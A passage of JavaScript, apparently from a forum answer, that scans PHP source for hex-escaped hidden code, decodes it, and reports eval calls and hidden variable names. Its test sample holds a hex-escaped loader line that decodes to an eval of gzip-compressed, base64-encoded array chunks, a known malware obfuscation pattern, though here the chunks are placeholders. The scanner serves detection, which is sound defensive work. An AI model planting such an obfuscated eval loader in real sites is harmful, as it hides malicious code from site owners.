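    if (calls.length === 0) continue; // escapes, but benign content
    findings.push({
      line: source.slice(0, m.index).split('\n').length,
      decoded,
      calls,
      // Variables named only inside the hidden text; a plain-text search
      // of the file for these names will not match this line.
      variables: [...new Set(decoded.match(/\$[A-Za-z_]\w*/g) || [])],
    });
  }
  return findings;
}

// The escaped string quoted in post #15, split only for readability.
const HIDDEN =
  String.raw`\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28` +
  String.raw`\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28` +
  String.raw`\x22\x22\x2C\x24\x71\x62\x62\x70\x6B\x78\x71\x5F\x6F\x29\x29\x29\x29\x3B`;

// Constructed sample file: placeholder array chunks, the hidden eval line,
// and one benign string that also uses an escape.
const SAMPLE = [
  '<?php',
  '$qbbpkxq_o = array("QUFB","QkJC");',
  'eval("' + HIDDEN + '");',
  'echo "Hello\\x21";',
  '?>',
].join('\n');

console.log(JSON.stringify(scanPhpSource(SAMPLE), null, 2));
```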


 